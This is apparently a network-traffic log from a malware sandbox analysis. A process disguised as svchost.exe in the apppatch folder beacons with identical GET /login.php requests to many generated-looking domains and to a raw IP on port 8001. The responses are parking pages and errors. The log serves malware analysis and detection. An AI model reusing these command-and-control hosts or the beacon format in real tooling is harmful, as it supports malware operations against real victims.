Aug 23, 2024 18:48:26.313071966 CEST	403	IN	HTTP/1.1 302 Moved Temporarily Server: openresty/1.15.8.1 Date: Fri, 23 Aug 2024 16:48:26 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive Location: http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.15.8.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	64294	106.15.137.66	8001	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:24.874914885 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:25.988528967 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:48:25 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:25 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	64295	106.15.137.66	8001	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:26.319967985 CEST	295	OUT	GET /dh/147287063_637385.html HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: 106.15.137.66:8001 Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:27.443833113 CEST	1043	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.3 Date: Fri, 23 Aug 2024 16:48:27 GMT Content-Type: text/html Content-Length: 561 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->HTTP/1.1 400 Bad RequestServer: openresty/1.21.4.3Date: Fri, 23 Aug 2024 16:48:27 GMTContent-Type: text/htmlContent-Length: 163Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.21.4.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	64297	13.248.169.48	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:31.629614115 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	64298	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:35.702896118 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com Content-Length: 6 Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1\|8.46.123.33\|1724431658\|1724431658\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:36.203397989 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e67e5bdc7da6809b4e043748c6ce58a1\|8.46.123.33\|1724431716\|1724431658\|29\|2\|0; path=/; domain=.gadyciz.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	64299	15.197.240.20	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:35.714055061 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	64300	64.225.91.73	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:35.714438915 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:36.316200018 CEST	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Fri, 23 Aug 2024 16:48:36 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 [TRUNCATED] Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	64301	103.224.182.252	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:36.018482924 CEST	302	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Content-Length: 6 Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:36.638926983 CEST	242	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:48:36 GMT server: Apache location: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	64302	103.224.212.210	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:36.029324055 CEST	302	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Content-Length: 6 Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:36.648309946 CEST	244	IN	HTTP/1.1 302 Found date: Fri, 23 Aug 2024 16:48:36 GMT server: Apache location: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	64303	154.85.183.50	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:36.049006939 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:36.973824024 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:48:36 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Aug 23, 2024 18:48:36.975828886 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:37.314152002 CEST	307	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:48:37 GMT Content-Type: text/html Content-Length: 138 Connection: keep-alive ETag: "663ee226-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	64304	64.190.63.136	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:36.688349962 CEST	354	OUT	GET /login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1724431658.5743798 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:37.467792034 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:48:37 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CwBuZLl7wgqV+XNajdiD1pY/fk3CkDg4EeCg8CAl7HcItmfhOmkkdyeCkPqtH3O9tttQFe5iAkyLlFBYLl8dIQ== last-modified: Fri, 23 Aug 2024 16:48:37 GMT x-cache-miss-from: parking-89b87dbbb-ntdtc server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 43 77 42 75 5a 4c 6c 37 77 67 71 56 2b 58 4e 61 6a 64 69 44 31 70 59 2f 66 6b 33 43 6b 44 67 34 45 65 43 67 38 43 41 6c 37 48 63 49 74 6d 66 68 4f 6d 6b 6b 64 79 65 43 6b 50 71 74 48 33 4f 39 74 74 74 51 46 65 35 69 41 6b 79 4c 6c 46 42 59 4c 6c 38 64 49 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 76 6f 66 79 63 6f 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 54 68 69 73 20 77 65 62 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_CwBuZLl7wgqV+XNajdiD1pY/fk3CkDg4EeCg8CAl7HcItmfhOmkkdyeCkPqtH3O9tttQFe5iAkyLlFBYLl8dIQ==><head><meta charset="utf-8"><title>vofycot.com - This website is for sale! - vofycot Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="This website is for sale! vofycot.com is your first and best
Aug 23, 2024 18:48:37.468650103 CEST	1236	IN	Data Raw: 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f Data Ascii: source for all of the information youre looking for. From general topics to more of what you would expect to find here, vofycot.com hAECas it all. We hope you find what you are searching for!"><link rel="icon" type="ima
Aug 23, 2024 18:48:37.468663931 CEST	1236	IN	Data Raw: 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 61 75 64 69 6f 3a 6e 6f 74 28 5b 63 6f 6e 74 72 6f 6c 73 5d 29 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 30 7d 69 6d 67 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d Data Ascii: ay:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visibl
Aug 23, 2024 18:48:37.471925020 CEST	1236	IN	Data Raw: 74 6f 6e 3b 66 6f 6e 74 3a 69 6e 68 65 72 69 74 7d 64 65 74 61 69 6c 73 2c 6d 65 6e 75 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 73 75 6d 6d 61 72 79 7b 64 69 73 70 6c 61 79 3a 6c 69 73 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c Data Ascii: ton;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.annou
Aug 23, 2024 18:48:37.471935987 CEST	1236	IN	Data Raw: 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 64 69 73 63 Data Ascii: a{font-size:10px}.container-disclaimer__content-text{color:#949494}.container-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint_
Aug 23, 2024 18:48:37.475547075 CEST	1236	IN	Data Raw: 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 Data Ascii: in-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:
Aug 23, 2024 18:48:37.475565910 CEST	1236	IN	Data Raw: 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 Data Ascii: ckground-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff
Aug 23, 2024 18:48:37.478667021 CEST	1236	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 7d 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 65 31 36 32 65 Data Ascii: ransform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:20px;padding-left:
Aug 23, 2024 18:48:37.478678942 CEST	1236	IN	Data Raw: 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 74 72 61 Data Ascii: -moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1}.container-content--lp{min-height:720px}.container-content--rp{width:100%;min-height:820px;margin:0}.container-content--twot{min-hei
Aug 23, 2024 18:48:37.481442928 CEST	1236	IN	Data Raw: 65 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 68 65 61 64 65 72 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 66 64 38 30 31 Data Ascii: e}.webarchive-block{text-align:center}.webarchive-block__header-link{color:#9fd801;font-size:20px}.webarchive-block__list{padding:0}.webarchive-block__list-element{word-wrap:break-word;list-style:none}.webarchive-block__list-element-link{line-
Aug 23, 2024 18:48:37.481455088 CEST	1236	IN	Data Raw: 4f 39 74 74 74 51 46 65 35 69 41 6b 79 4c 6c 46 42 59 4c 6c 38 64 49 51 3d 3d 22 2c 22 74 69 64 22 3a 22 33 30 39 37 22 2c 22 62 75 79 62 6f 78 22 3a 74 72 75 65 2c 22 62 75 79 62 6f 78 54 6f 70 69 63 22 3a 74 72 75 65 2c 22 64 69 73 63 6c 61 69 Data Ascii: O9tttQFe5iAkyLlFBYLl8dIQ==","tid":"3097","buybox":true,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"https://sedo.com/search/details/?partnerid=14460&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	64305	199.59.243.226	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:36.690232992 CEST	356	OUT	GET /login.php?subid1=20240824-0248-365f-be38-e61788a8e181 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1724431658.5024510 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
